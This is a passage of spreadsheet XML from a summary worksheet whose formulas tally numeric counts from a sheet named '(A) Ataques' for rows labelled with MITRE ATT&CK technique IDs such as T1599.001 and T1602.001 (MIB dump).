        <f>'(A) Ataques'!LY103+'(A) Ataques'!ME103+'(A) Ataques'!MK103+'(A) Ataques'!MQ103+'(A) Ataques'!MW103</f>
        <v>0</v>
      </c>
      <c r="BB103" s="471">
        <f>'(A) Ataques'!LQ103</f>
        <v>0</v>
      </c>
      <c r="BC103" s="331">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($AY103=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD103" s="469">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!LL103,"")</f>
        <v>64</v>
      </c>
      <c r="BE103" s="510">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!LM103,"")</f>
        <v>64</v>
      </c>
      <c r="BF103" s="471">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!LN103,"")</f>
        <v>0</v>
      </c>
      <c r="BG103" s="471">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!LO103,"")</f>
        <v>7</v>
      </c>
      <c r="BH103" s="471">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!LS103,"")</f>
        <v>59</v>
      </c>
      <c r="BI103" s="331">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($BD103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ103" s="469">
        <f>'(A) Ataques'!OL103+'(A) Ataques'!OR103+'(A) Ataques'!OX103+'(A) Ataques'!PD103+'(A) Ataques'!PJ103</f>
        <v>5</v>
      </c>
      <c r="BK103" s="510">
        <f>'(A) Ataques'!ON103+'(A) Ataques'!OT103+'(A) Ataques'!OZ103+'(A) Ataques'!PF103+'(A) Ataques'!PL103</f>
        <v>5</v>
      </c>
      <c r="BL103" s="471">
        <f>'(A) Ataques'!OP103+'(A) Ataques'!OV103+'(A) Ataques'!PB103+'(A) Ataques'!PH103+'(A) Ataques'!PN103</f>
        <v>2</v>
      </c>
      <c r="BM103" s="495">
        <f>'(A) Ataques'!OH103</f>
        <v>4</v>
      </c>
      <c r="BN103" s="331">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($BJ103=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO103" s="469">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!OC103,"")</f>
        <v>5</v>
      </c>
      <c r="BP103" s="510">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!OD103,"")</f>
        <v>5</v>
      </c>
      <c r="BQ103" s="471">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!OE103,"")</f>
        <v>2</v>
      </c>
      <c r="BR103" s="471">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!OF103,"")</f>
        <v>1</v>
      </c>
      <c r="BS103" s="471">
        <f>IF('(A) Ataques'!$AP103&lt;&gt;"NO",'(A) Ataques'!OJ103,"")</f>
        <v>4</v>
      </c>
      <c r="BT103" s="331">
        <f>IF('(A) Ataques'!$AK103&lt;&gt;"NO",IF($BO103=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="104" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A104" s="79">
        <f t="shared" si="1"/>
        <v>102</v>
      </c>
      <c r="B104" s="4">
        <f>IF('(A) Ataques'!AK104&lt;&gt;"NO",'(A) Ataques'!E104,"")</f>
        <v>70</v>
      </c>
      <c r="C104" s="6" t="str">
        <f>IF('(A) Ataques'!AK104&lt;&gt;"NO",IF('(A) Ataques'!M104="","",'(A) Ataques'!M104),"")</f>
        <v>T1599.001-NBB1</v>
      </c>
      <c r="D104" s="4" t="str">
        <f>IF('(A) Ataques'!AK104&lt;&gt;"NO",'(A) Ataques'!F104,"")</f>
        <v>T1599</v>
      </c>
      <c r="E104" s="286">
        <f>IF('(A) Ataques'!AK104&lt;&gt;"NO",'(A) Ataques'!AQ104,"")</f>
        <v>5</v>
      </c>
      <c r="F104" s="288">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!BB104,"")</f>
        <v>9</v>
      </c>
      <c r="G104" s="392">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!BD104,"")</f>
        <v>4</v>
      </c>
      <c r="H104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!BF104,"")</f>
        <v>3</v>
      </c>
      <c r="I104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!BG104,"")</f>
        <v>2</v>
      </c>
      <c r="J104" s="530">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($F104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BH104,"")</f>
        <v>0</v>
      </c>
      <c r="L104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BJ104,"")</f>
        <v>0</v>
      </c>
      <c r="M104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BL104,"")</f>
        <v>0</v>
      </c>
      <c r="N104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BM104,"")</f>
        <v>0</v>
      </c>
      <c r="O104" s="532">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($K104=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P104" s="292">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BN104,"")</f>
        <v>9</v>
      </c>
      <c r="Q104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BP104,"")</f>
        <v>4</v>
      </c>
      <c r="R104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BR104,"")</f>
        <v>3</v>
      </c>
      <c r="S104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BS104,"")</f>
        <v>2</v>
      </c>
      <c r="T104" s="530">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($P104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BT104,"")</f>
        <v>12</v>
      </c>
      <c r="V104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BV104,"")</f>
        <v>6</v>
      </c>
      <c r="W104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BX104,"")</f>
        <v>4</v>
      </c>
      <c r="X104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$BY104,"")</f>
        <v>2</v>
      </c>
      <c r="Y104" s="532">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($U104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z104" s="288">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!BZ104,"")</f>
        <v>12</v>
      </c>
      <c r="AA104" s="392">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!CB104,"")</f>
        <v>11</v>
      </c>
      <c r="AB104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!CD104,"")</f>
        <v>5</v>
      </c>
      <c r="AC104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!CE104,"")</f>
        <v>5</v>
      </c>
      <c r="AD104" s="331">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF(Z104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CF104,"")</f>
        <v>24</v>
      </c>
      <c r="AF104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CH104,"")</f>
        <v>17</v>
      </c>
      <c r="AG104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CJ104,"")</f>
        <v>9</v>
      </c>
      <c r="AH104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CK104,"")</f>
        <v>5</v>
      </c>
      <c r="AI104" s="287">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($AE104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ104" s="292">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CL104,"")</f>
        <v>0</v>
      </c>
      <c r="AK104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CN104,"")</f>
        <v>0</v>
      </c>
      <c r="AL104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CP104,"")</f>
        <v>0</v>
      </c>
      <c r="AM104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CQ104,"")</f>
        <v>0</v>
      </c>
      <c r="AN104" s="331">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($AJ104=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CR104,"")</f>
        <v>3</v>
      </c>
      <c r="AP104" s="322">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CT104,"")</f>
        <v>2</v>
      </c>
      <c r="AQ104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CV104,"")</f>
        <v>1</v>
      </c>
      <c r="AR104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!$CW104,"")</f>
        <v>2</v>
      </c>
      <c r="AS104" s="287">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($AO104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT104" s="288">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!CX104,"")</f>
        <v>12</v>
      </c>
      <c r="AU104" s="392">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!CZ104,"")</f>
        <v>6</v>
      </c>
      <c r="AV104" s="4">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!DB104,"")</f>
        <v>4</v>
      </c>
      <c r="AW104" s="20">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",'(A) Ataques'!DC104,"")</f>
        <v>2</v>
      </c>
      <c r="AX104" s="331">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($AT104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY104" s="469">
        <f>'(A) Ataques'!LU104+'(A) Ataques'!MA104+'(A) Ataques'!MG104+'(A) Ataques'!MM104+'(A) Ataques'!MS104</f>
        <v>1</v>
      </c>
      <c r="AZ104" s="510">
        <f>'(A) Ataques'!LW104+'(A) Ataques'!MC104+'(A) Ataques'!MI104+'(A) Ataques'!MO104+'(A) Ataques'!MU104</f>
        <v>1</v>
      </c>
      <c r="BA104" s="471">
        <f>'(A) Ataques'!LY104+'(A) Ataques'!ME104+'(A) Ataques'!MK104+'(A) Ataques'!MQ104+'(A) Ataques'!MW104</f>
        <v>1</v>
      </c>
      <c r="BB104" s="471">
        <f>'(A) Ataques'!LQ104</f>
        <v>1</v>
      </c>
      <c r="BC104" s="331">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($AY104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD104" s="469">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!LL104,"")</f>
        <v>8</v>
      </c>
      <c r="BE104" s="510">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!LM104,"")</f>
        <v>8</v>
      </c>
      <c r="BF104" s="471">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!LN104,"")</f>
        <v>1</v>
      </c>
      <c r="BG104" s="471">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!LO104,"")</f>
        <v>3</v>
      </c>
      <c r="BH104" s="471">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!LS104,"")</f>
        <v>5</v>
      </c>
      <c r="BI104" s="331">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($BD104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ104" s="469">
        <f>'(A) Ataques'!OL104+'(A) Ataques'!OR104+'(A) Ataques'!OX104+'(A) Ataques'!PD104+'(A) Ataques'!PJ104</f>
        <v>2</v>
      </c>
      <c r="BK104" s="510">
        <f>'(A) Ataques'!ON104+'(A) Ataques'!OT104+'(A) Ataques'!OZ104+'(A) Ataques'!PF104+'(A) Ataques'!PL104</f>
        <v>2</v>
      </c>
      <c r="BL104" s="471">
        <f>'(A) Ataques'!OP104+'(A) Ataques'!OV104+'(A) Ataques'!PB104+'(A) Ataques'!PH104+'(A) Ataques'!PN104</f>
        <v>1</v>
      </c>
      <c r="BM104" s="495">
        <f>'(A) Ataques'!OH104</f>
        <v>2</v>
      </c>
      <c r="BN104" s="331">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($BJ104=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO104" s="469">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!OC104,"")</f>
        <v>2</v>
      </c>
      <c r="BP104" s="510">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!OD104,"")</f>
        <v>2</v>
      </c>
      <c r="BQ104" s="471">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!OE104,"")</f>
        <v>1</v>
      </c>
      <c r="BR104" s="471">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!OF104,"")</f>
        <v>1</v>
      </c>
      <c r="BS104" s="471">
        <f>IF('(A) Ataques'!$AP104&lt;&gt;"NO",'(A) Ataques'!OJ104,"")</f>
        <v>2</v>
      </c>
      <c r="BT104" s="331">
        <f>IF('(A) Ataques'!$AK104&lt;&gt;"NO",IF($BO104=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="105" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A105" s="79">
        <f t="shared" si="1"/>
        <v>103</v>
      </c>
      <c r="B105" s="4">
        <f>IF('(A) Ataques'!AK105&lt;&gt;"NO",'(A) Ataques'!E105,"")</f>
        <v>70</v>
      </c>
      <c r="C105" s="6" t="str">
        <f>IF('(A) Ataques'!AK105&lt;&gt;"NO",IF('(A) Ataques'!M105="","",'(A) Ataques'!M105),"")</f>
        <v>T1599.001-NBB2</v>
      </c>
      <c r="D105" s="4" t="str">
        <f>IF('(A) Ataques'!AK105&lt;&gt;"NO",'(A) Ataques'!F105,"")</f>
        <v>T1599</v>
      </c>
      <c r="E105" s="286">
        <f>IF('(A) Ataques'!AK105&lt;&gt;"NO",'(A) Ataques'!AQ105,"")</f>
        <v>3</v>
      </c>
      <c r="F105" s="288">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!BB105,"")</f>
        <v>3</v>
      </c>
      <c r="G105" s="392">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!BD105,"")</f>
        <v>1</v>
      </c>
      <c r="H105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!BF105,"")</f>
        <v>1</v>
      </c>
      <c r="I105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!BG105,"")</f>
        <v>1</v>
      </c>
      <c r="J105" s="530">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($F105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BH105,"")</f>
        <v>0</v>
      </c>
      <c r="L105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BJ105,"")</f>
        <v>0</v>
      </c>
      <c r="M105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BL105,"")</f>
        <v>0</v>
      </c>
      <c r="N105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BM105,"")</f>
        <v>0</v>
      </c>
      <c r="O105" s="532">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($K105=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P105" s="292">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BN105,"")</f>
        <v>3</v>
      </c>
      <c r="Q105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BP105,"")</f>
        <v>1</v>
      </c>
      <c r="R105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BR105,"")</f>
        <v>1</v>
      </c>
      <c r="S105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BS105,"")</f>
        <v>1</v>
      </c>
      <c r="T105" s="530">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($P105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BT105,"")</f>
        <v>4</v>
      </c>
      <c r="V105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BV105,"")</f>
        <v>2</v>
      </c>
      <c r="W105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BX105,"")</f>
        <v>2</v>
      </c>
      <c r="X105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$BY105,"")</f>
        <v>1</v>
      </c>
      <c r="Y105" s="532">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($U105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z105" s="288">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!BZ105,"")</f>
        <v>5</v>
      </c>
      <c r="AA105" s="392">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!CB105,"")</f>
        <v>3</v>
      </c>
      <c r="AB105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!CD105,"")</f>
        <v>3</v>
      </c>
      <c r="AC105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!CE105,"")</f>
        <v>1</v>
      </c>
      <c r="AD105" s="331">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF(Z105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CF105,"")</f>
        <v>9</v>
      </c>
      <c r="AF105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CH105,"")</f>
        <v>5</v>
      </c>
      <c r="AG105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CJ105,"")</f>
        <v>5</v>
      </c>
      <c r="AH105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CK105,"")</f>
        <v>1</v>
      </c>
      <c r="AI105" s="287">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($AE105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ105" s="292">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CL105,"")</f>
        <v>0</v>
      </c>
      <c r="AK105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CN105,"")</f>
        <v>0</v>
      </c>
      <c r="AL105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CP105,"")</f>
        <v>0</v>
      </c>
      <c r="AM105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CQ105,"")</f>
        <v>0</v>
      </c>
      <c r="AN105" s="331">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($AJ105=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CR105,"")</f>
        <v>1</v>
      </c>
      <c r="AP105" s="322">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CT105,"")</f>
        <v>1</v>
      </c>
      <c r="AQ105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CV105,"")</f>
        <v>1</v>
      </c>
      <c r="AR105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!$CW105,"")</f>
        <v>1</v>
      </c>
      <c r="AS105" s="287">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($AO105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT105" s="288">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!CX105,"")</f>
        <v>4</v>
      </c>
      <c r="AU105" s="392">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!CZ105,"")</f>
        <v>2</v>
      </c>
      <c r="AV105" s="4">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!DB105,"")</f>
        <v>2</v>
      </c>
      <c r="AW105" s="20">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",'(A) Ataques'!DC105,"")</f>
        <v>1</v>
      </c>
      <c r="AX105" s="331">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($AT105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY105" s="469">
        <f>'(A) Ataques'!LU105+'(A) Ataques'!MA105+'(A) Ataques'!MG105+'(A) Ataques'!MM105+'(A) Ataques'!MS105</f>
        <v>1</v>
      </c>
      <c r="AZ105" s="510">
        <f>'(A) Ataques'!LW105+'(A) Ataques'!MC105+'(A) Ataques'!MI105+'(A) Ataques'!MO105+'(A) Ataques'!MU105</f>
        <v>1</v>
      </c>
      <c r="BA105" s="471">
        <f>'(A) Ataques'!LY105+'(A) Ataques'!ME105+'(A) Ataques'!MK105+'(A) Ataques'!MQ105+'(A) Ataques'!MW105</f>
        <v>1</v>
      </c>
      <c r="BB105" s="471">
        <f>'(A) Ataques'!LQ105</f>
        <v>1</v>
      </c>
      <c r="BC105" s="331">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($AY105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD105" s="469">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!LL105,"")</f>
        <v>3</v>
      </c>
      <c r="BE105" s="510">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!LM105,"")</f>
        <v>3</v>
      </c>
      <c r="BF105" s="471">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!LN105,"")</f>
        <v>1</v>
      </c>
      <c r="BG105" s="471">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!LO105,"")</f>
        <v>2</v>
      </c>
      <c r="BH105" s="471">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!LS105,"")</f>
        <v>1</v>
      </c>
      <c r="BI105" s="331">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($BD105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ105" s="469">
        <f>'(A) Ataques'!OL105+'(A) Ataques'!OR105+'(A) Ataques'!OX105+'(A) Ataques'!PD105+'(A) Ataques'!PJ105</f>
        <v>1</v>
      </c>
      <c r="BK105" s="510">
        <f>'(A) Ataques'!ON105+'(A) Ataques'!OT105+'(A) Ataques'!OZ105+'(A) Ataques'!PF105+'(A) Ataques'!PL105</f>
        <v>1</v>
      </c>
      <c r="BL105" s="471">
        <f>'(A) Ataques'!OP105+'(A) Ataques'!OV105+'(A) Ataques'!PB105+'(A) Ataques'!PH105+'(A) Ataques'!PN105</f>
        <v>1</v>
      </c>
      <c r="BM105" s="495">
        <f>'(A) Ataques'!OH105</f>
        <v>1</v>
      </c>
      <c r="BN105" s="331">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($BJ105=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO105" s="469">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!OC105,"")</f>
        <v>1</v>
      </c>
      <c r="BP105" s="510">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!OD105,"")</f>
        <v>1</v>
      </c>
      <c r="BQ105" s="471">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!OE105,"")</f>
        <v>1</v>
      </c>
      <c r="BR105" s="471">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!OF105,"")</f>
        <v>1</v>
      </c>
      <c r="BS105" s="471">
        <f>IF('(A) Ataques'!$AP105&lt;&gt;"NO",'(A) Ataques'!OJ105,"")</f>
        <v>1</v>
      </c>
      <c r="BT105" s="331">
        <f>IF('(A) Ataques'!$AK105&lt;&gt;"NO",IF($BO105=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="106" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A106" s="79">
        <f t="shared" si="1"/>
        <v>104</v>
      </c>
      <c r="B106" s="4">
        <f>IF('(A) Ataques'!AK106&lt;&gt;"NO",'(A) Ataques'!E106,"")</f>
        <v>71</v>
      </c>
      <c r="C106" s="6" t="str">
        <f>IF('(A) Ataques'!AK106&lt;&gt;"NO",IF('(A) Ataques'!M106="","",'(A) Ataques'!M106),"")</f>
        <v>T1602.001-MIB_Dump</v>
      </c>
      <c r="D106" s="4" t="str">
        <f>IF('(A) Ataques'!AK106&lt;&gt;"NO",'(A) Ataques'!F106,"")</f>
        <v>T1602</v>
      </c>
      <c r="E106" s="286">
        <f>IF('(A) Ataques'!AK106&lt;&gt;"NO",'(A) Ataques'!AQ106,"")</f>
        <v>2</v>
      </c>
      <c r="F106" s="288">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!BB106,"")</f>
        <v>0</v>
      </c>
      <c r="G106" s="392">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!BD106,"")</f>
        <v>0</v>
      </c>
      <c r="H106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!BF106,"")</f>
        <v>0</v>
      </c>
      <c r="I106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!BG106,"")</f>
        <v>0</v>
      </c>
      <c r="J106" s="530">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($F106=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BH106,"")</f>
        <v>396</v>
      </c>
      <c r="L106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BJ106,"")</f>
        <v>1</v>
      </c>
      <c r="M106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BL106,"")</f>
        <v>1</v>
      </c>
      <c r="N106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BM106,"")</f>
        <v>1</v>
      </c>
      <c r="O106" s="532">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",IF($K106=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P106" s="292">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BN106,"")</f>
        <v>396</v>
      </c>
      <c r="Q106" s="322">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BP106,"")</f>
        <v>1</v>
      </c>
      <c r="R106" s="4">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BR106,"")</f>
        <v>1</v>
      </c>
      <c r="S106" s="20">
        <f>IF('(A) Ataques'!$AK106&lt;&gt;"NO",'(A) Ataques'!$BS106,"")</f>
        <v>1</v>
      </c>
      <c r="T106" s="530">
